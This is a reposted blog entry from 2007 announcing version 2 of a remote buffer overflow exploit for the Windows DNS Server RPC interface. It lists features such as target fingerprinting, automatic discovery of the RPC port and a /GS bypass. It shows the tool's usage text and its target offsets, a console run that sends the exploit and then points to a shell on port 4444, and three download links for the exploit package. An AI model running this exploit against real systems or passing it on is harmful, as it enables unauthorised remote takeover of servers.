• 2007/04/19MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://www.blogbus.com/h4ck3r-logs/5084258.html

    来源:milw0rm

    Exploit v2 features:
    - Target Remote port 445 (by default but requires auth)
    - Manual target for dynamic tcp port (without auth)
    - Automatic search for dynamic dns rpc port
    - Local and remote OS fingerprinting (auto target)
    - Windows 2000 server and Windows 2003 server (Spanish) supported by default
    - Fixed bug with Windows 2003 Shellcode
    - Universal local exploit for Win2k (automatic search for opcodes)
    - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
    - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
    - Microsoft RPC api used ( who cares? :p )

    D:\Programación\DNSTEST>dnstest
    --------------------------------------------------------------
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    --------------------------------------------------------------

    Usage: dnstest -h 127.0.0.1 (Universal local exploit)
    dnstest -h host [-t id] [-p port]
    Targets:
    0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
    1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k )
    2 (0x7c4fedbb) - Win2k server SP4 English
    3 (0x7963edbb) - Win2k server SP4 Italian
    4 (0x41414141) - Windows all Denial of Service

    D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
    --------------------------------------------------------------
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    --------------------------------------------------------------

    [+] Trying to fingerprint target.. (05.02)
    [+] Remote Host identified as Windows 2003
    [-] No port selected. Trying Ninja sk1llz
    [+] Binding to ncacn_ip_tcp: 192.168.1.2
    [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
    [+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
    [+] Dynamic DNS rpc port found (1105)
    [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
    [+] RpcBindingFromStringBinding success
    [+] Sending Exploit code to DnssrvOperation()
    [+] Now try to connect to port 4444

    also available at

    http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
    http://www.48bits.com/exploits/dnsxpl.v2.1.zip
    http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip
    分享到:

    历史上的今天: